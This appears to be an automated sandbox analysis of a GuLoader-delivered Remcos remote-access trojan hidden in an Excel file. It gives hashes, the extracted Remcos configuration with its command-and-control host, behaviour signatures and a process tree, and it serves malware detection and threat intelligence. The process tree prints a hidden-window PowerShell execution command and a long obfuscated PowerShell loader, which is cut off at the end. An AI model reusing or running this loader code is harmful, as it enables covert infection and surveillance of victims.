guloader | f08bfda687fb0ba2d1e4563a6a7d75958d5ef4a1b7ea61b51c96ddc08202e1ba

General

Target

SOA-0438.xlsx
Size

707KB
MD5

261cc699f2de3e15d63c9a9180cb8625
SHA1

db971ea8c3b8f0a9a301995b6c3c8523f581d831
SHA256

f08bfda687fb0ba2d1e4563a6a7d75958d5ef4a1b7ea61b51c96ddc08202e1ba
SHA512

52890f68712fc3602a31ba84f014728bfb362154d4ba0ed19ff9a3aa0fb038b3a1302a8059902117c88db4c36620434947e379ef423674762b527798731dcda1
SSDEEP

12288:M/UZf3FotX6dmtGrDDkBB9UFG+ZFQsnRV4hSISDCQ2UYWCQ5BEpMYzKGyOq:MOF+zGoBB9StZ2wvZISDC4Yk0EOq

Score

10^/10

guloader remcos awelle-host downloader rat

Malware Config

Extracted

Family

remcos

Botnet

Awelle-Host

C2

gdyhjjdhbvxgsfe.gotdns.ch:2718

Attributes

audio_folder
MicRecords
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
true
keylog_file
logs.dat
keylog_flag
false
keylog_path
%AppData%
mouse_option
false
mutex
Rmc-W62KZF
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
downloader guloader
Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos
Blocklisted process makes network request 1 IoCs

Processes:

EQNEDT32.EXE

flow pid process

1 1100 EQNEDT32.EXE
Downloads MZ/PE file

flow	pid	process
1	1100	EQNEDT32.EXE

Checks QEMU agent file 2 TTPs 2 IoCs

Checks presence of QEMU agent, possibly to detect virtualization.

Query Registry

T1012

System Information Discovery

T1082

Processes:

ieinstal.exepowershell.exe

description	ioc	process
File opened (read-only)	C:\Program Files\Qemu-ga\qemu-ga.exe	ieinstal.exe
File opened (read-only)	C:\Program Files\Qemu-ga\qemu-ga.exe	powershell.exe

Executes dropped EXE 1 IoCs

Processes:

GHJ.exe

pid process

728 GHJ.exe
Loads dropped DLL 1 IoCs

Processes:

EQNEDT32.EXE

pid process

1100 EQNEDT32.EXE
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

Processes:

ieinstal.exe

pid process

1128 ieinstal.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

powershell.exeieinstal.exe

pid process

940 powershell.exe
1128 ieinstal.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 940 set thread context of 1128 940 powershell.exe ieinstal.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Enumerates system info in registry 2 TTPs 1 IoCs

Query Registry
T1012

System Information Discovery
T1082

Processes:

EXCEL.EXE

description ioc process

Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor EXCEL.EXE
Launches Equation Editor 1 TTPs 1 IoCs
Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.
exploit

Exploitation for Client Execution
T1203

Processes:

EQNEDT32.EXE

pid process

1100 EQNEDT32.EXE

pid	process
728	GHJ.exe

pid	process
1100	EQNEDT32.EXE

pid	process
1128	ieinstal.exe

pid	process
940	powershell.exe
1128	ieinstal.exe

description	pid	process	target process
PID 940 set thread context of 1128	940	powershell.exe	ieinstal.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor	EXCEL.EXE

pid	process
1100	EQNEDT32.EXE

Modifies Internet Explorer settings 1 TTPs 31 IoCs

adware spyware

Modify Registry

T1112

Processes:

EXCEL.EXE

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Software\Microsoft\Internet Explorer\MenuExt	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\COMMAND	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\ = "&Edit"	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command	EXCEL.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1"	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote	EXCEL.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55"	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\COMMAND	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes"	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel	EXCEL.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit	EXCEL.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Software\Microsoft\Internet Explorer\Toolbar	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000"	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3499517378-2376672570-1134980332-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105"	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\ = "&Edit"	EXCEL.EXE

Modifies registry class 64 IoCs

Processes:

EXCEL.EXE

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde"	EXCEL.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\ = "[open(\"%1\")]"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shellex\IconHandler	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\command	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit	EXCEL.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" %1"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\DefaultIcon	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ = "&Open"	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\application\ = "Excel"	EXCEL.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\ = "&Open"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" %1"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\command	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version\14	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\ = "[open(\"%1\")]"	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ = "&Open"	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32\ = "C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohevi.dll"	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\ = "&Edit"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\command	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec	EXCEL.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon\htmlfile	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ = "&Open"	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1"	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\ = "[open(\"%1\")]"	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde"	EXCEL.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe	EXCEL.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\ShellEx	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit	EXCEL.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

EXCEL.EXE

pid process

1668 EXCEL.EXE
Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

powershell.exepowershell.exe

pid process

1796 powershell.exe
940 powershell.exe
Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

powershell.exe

pid process

940 powershell.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 1796 powershell.exe
Token: SeDebugPrivilege 940 powershell.exe
Suspicious use of SetWindowsHookEx 6 IoCs

Processes:

EXCEL.EXEieinstal.exe

pid process

1668 EXCEL.EXE
1668 EXCEL.EXE
1668 EXCEL.EXE
1668 EXCEL.EXE
1668 EXCEL.EXE
1128 ieinstal.exe

pid	process
1668	EXCEL.EXE

pid	process
1796	powershell.exe
940	powershell.exe

pid	process
940	powershell.exe

description	pid	process
Token: SeDebugPrivilege	1796	powershell.exe
Token: SeDebugPrivilege	940	powershell.exe

pid	process
1668	EXCEL.EXE
1668	EXCEL.EXE
1668	EXCEL.EXE
1668	EXCEL.EXE
1668	EXCEL.EXE
1128	ieinstal.exe

Suspicious use of WriteProcessMemory 20 IoCs

Processes:

EQNEDT32.EXEGHJ.exepowershell.exepowershell.exe

description	pid	process	target process
PID 1100 wrote to memory of 728	1100	EQNEDT32.EXE	GHJ.exe
PID 1100 wrote to memory of 728	1100	EQNEDT32.EXE	GHJ.exe
PID 1100 wrote to memory of 728	1100	EQNEDT32.EXE	GHJ.exe
PID 1100 wrote to memory of 728	1100	EQNEDT32.EXE	GHJ.exe
PID 728 wrote to memory of 1796	728	GHJ.exe	powershell.exe
PID 728 wrote to memory of 1796	728	GHJ.exe	powershell.exe
PID 728 wrote to memory of 1796	728	GHJ.exe	powershell.exe
PID 728 wrote to memory of 1796	728	GHJ.exe	powershell.exe
PID 1796 wrote to memory of 940	1796	powershell.exe	powershell.exe
PID 1796 wrote to memory of 940	1796	powershell.exe	powershell.exe
PID 1796 wrote to memory of 940	1796	powershell.exe	powershell.exe
PID 1796 wrote to memory of 940	1796	powershell.exe	powershell.exe
PID 940 wrote to memory of 1128	940	powershell.exe	ieinstal.exe
PID 940 wrote to memory of 1128	940	powershell.exe	ieinstal.exe
PID 940 wrote to memory of 1128	940	powershell.exe	ieinstal.exe
PID 940 wrote to memory of 1128	940	powershell.exe	ieinstal.exe
PID 940 wrote to memory of 1128	940	powershell.exe	ieinstal.exe
PID 940 wrote to memory of 1128	940	powershell.exe	ieinstal.exe
PID 940 wrote to memory of 1128	940	powershell.exe	ieinstal.exe
PID 940 wrote to memory of 1128	940	powershell.exe	ieinstal.exe

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\SOA-0438.xlsx
1⤵
- Enumerates system info in registry
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:1668

C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
1⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Launches Equation Editor
- Suspicious use of WriteProcessMemory
PID:1100

C:\Users\Admin\AppData\Roaming\GHJ.exe
"C:\Users\Admin\AppData\Roaming\GHJ.exe"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:728

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -windowstyle hidden $d = Get-Content 'C:\Users\Admin\AppData\Roaming\Forligsmandens\Genlsende\Tilvejebringelserne\Importunement\Smoothpate\Animate\rejselederens\Beardfishes41.Bum' ; powershell ''$d''
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1796

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Nonequivocally Tillgsskatternes Disbanded Livslnnens #>$mixersignal = """ B;PeFNauBun Nc UtDiiSkoinn L VeTOpeStl Aeunf MoApnBli On RsVatBorMru NkOmtUri Mo Fn CeSmr B1 K8Pa7Ur0Ma4Ro Da{Bl Sv Re R Hp MaBar NaFom S( b[AkS Ht PrdoiMun Bgmo] F`$ PDEkePhcGueUniMiv SeGrr OsMi)Ti; S A Rm Op Ka`$InSMat suPrdSwi He ps Pt fa FrShtSeeBrr UnImeCo2 s6Pa Sp=Fo DNRee OwKk-BjOLob GjOoeGoc Pt M Prbmay StDce H[Tr] N So(Dr`$OvD be OcSie GiCavVieBorVrsHi. ML BeSmn Eg CtAnhKa Sl/At F2Bn)En; R Ti U No BoFOmobar r(De`$ OE DfDefFje Fcbrt suPoaSllSan UeHusDoshr=Pa0 P;Fe F`$InE GfHof Ge IcMotHeu paCyl UnSoe SsSmsCh co-Wel ItDe Bo`$RdD MeSocDoe BiSpvCue RrTas G. DLSueRinEugNotobh B;Fo K`$ NE SfdmfDie Pc TtLnuStaDel PnLneAcsEksEy+Ta=Sl2Cl)Cr{Ld l Mi`$SlFwio Ln UeUsr SnOveSc L=Le M`$OpDdie FcAde BiBev Aevar bsSy.DrSFeu WbResSatParphi pnLigop(In`$ UEMifSuf Ue ScSltAnuPaa NlHunBaeBus CsSt,Pr Ra2An)Al; h Bu Ka N St Ne Am As is`$DiS Rt Fu Hd SiFoe Ws Ct Ra DrKat JeMarUdn veFe2Mo6Ve[Fu`$veE MfChf De Nc Ut Mu Ba Hl DnUne GsApsDi/Br2Ov]Hy R= A Fo[StcFaoManGav CeDer St C] C: C: ATukoPrB MyPatLee U( p`$ pFLeoCen ie LrFunVie E,Re Bi1Er6 S)Au; S S Tr`$ gSWit LuFodKui Ie NsPrt Ta HrQutteevgrGenSpe C2Cu6 E[ T`$ BE YfSif IeEmc StMeuAeaStlConHye ssRosAe/ T2Im]Bi F= J HN Do BnFoa TbGesUdoHar IpLutMoiDroSan F5 N N`$TrSHjt Fu Hd Ui He CsCitKiaOur Mt FeNorNonKoe F2 C6Pe[ p`$BrEVrfbifExe UcUdt KuReaBolBan seInssls S/To2 K] F Sh7Pr3 T;Br;Fy Al H U Pa}Re Da[ SSSktAsrRii Gn TgRe] G[KoSRey Ss Dt Ce KmBy.TyT Ke DxSet R.UnE Jn PcInoEddPairen SgSc] U:de:TeAArSOpC GI EI R.AfG Sefrt SSSvtBrr KiKanflg A(nr`$OpSCutDdu HdDji Ge Ms PtThaSkrLytTje ArKun Se M2Sk6 s) L;Re} G`$Trt Ae ag Nn Ae SsexeStr Ri Se Rd RaMit FaTabAnaAlsgoeTerSh0De=FaT Te UlBeeDifOxoskn TiBlnMys Ctafr FuGukMetsci KoThn me UrHo1Sc8 T7 D0Do4As S' P1ReAOp3 B0Qs3CrASo3 UDBa2PrCDe2Sq4Me6No7 B2VaDRo2do5Qu2 S5 H' i;sa`$OvtSteRygManRee Ss EeOvrFriRaeFrdAba PtSaa TbBeaMisPte RrSu1 T=RoTCoeTal FeUnfFoo Tnsmi dnTosLit ArMuuBikEnt PiAroMon PeunrAt1Bl8 B7 B0Fu4Ia B' U0 M4Bu2 e0Jr2 UASi3ToBPa2Sa6Sm3 HA A2Pr6 A2efF B3NeDsh6Sp7 F1AnE S2 S0 N2 K7 S7DeARy7 PBDo6Pr7 U1AlCTi2 B7By3AuA V2 C8 R2 FFFo2PyC V0Ov7 H2Sk8 D3reD T2No0Me3MaFTo2 SCOp0Dd4Ko2 UCGr3SeDSi2 P1 M2Sp6ce2leDUn3GuAGe' C; E`$ St Te AgRinPoe ws SeRerJui Ke OdVeaFat DaHybGeaBesSeeAkrJu2 M= WTSceNol PeThfGaounnpii MnDis VtTjrHouSckKotMoiDoo wn Ie UrAd1Eg8 M7sv0 H4 R Fr' A0 PEGr2BlC S3ReDDi1Dr9Ta3 RB b2Sp6 M2 MAHu0Sk8 f2HaD F2 BD K3MeBRi2WiC C3AmAMe3 SA L'Tw;Ry`$KltBaeMag BnMtePas Te Ar ViSeeSkdFaa Lt MaArb HaLes keSprme3An=MoT AequlPle DfTeoDenFoiAfnAfsDetEsrCouPrkShtAni SoTrnAreLer l1 S8Gr7Re0In4 I re'Fl1 UA C3 I0Fa3 AAFr3 PDSt2beCOp2An4Un6La7Pa1 TBAd3HeCLi2 B7 v3CeD N2 I0Jo2Mu4 B2SqCMo6In7 S0Ti0 r2Is7Ha3MaD G2 DCPo3SyB M2 M6Bu3Lo9Sh1SuA E2PrCAn3 UB C3 HFDe2Hy0 T2BaA A2 SCTo3 AABo6 s7 A0 S1Ba2De8Le2 S7Al2 SD E2 S5Nu2EpCBe1ChB E2 cCFa2DeFJa' R; M`$ TtTae FgStn KeSas Ie Gr LiSkeNod VaRetHoaGrbOvaKosTueAnr S4Ko= PT Cedel Re Gf UoBen OiSenElsSttStr Su AkHitStiReoLgn Pelor H1Dy8 P7 U0As4 S Su'Gi3MaASn3ToD K3ElB B2 T0 S2 J7Me2MeERe' S;Bu`$Bet FeLig Sn He JsNeePerAdiBae AdAraGut AaRebAnaStsEme NrTr5 S= TT SeWalMye IfTaoLanSpi Sn Hs Wt FrUluRekVatAri Lo Snbie ArTr1pl8 T7Tr0 S4Tr Ar'Av0 BELr2 IC S3GiDRd0Su4Un2no6 S2 GDLi3MiCAc2 F5 S2 TC D0Tr1De2fi8Fr2 O7Li2 OD F2Ma5 D2 PCAc' R; E`$ ptDieAtgEgn BeSls be Br Oi Ue Ed UaPlt FaHobBjafrsAse Sr S6La=BeT CeSnl deAnfPro PnFriFen IsRet 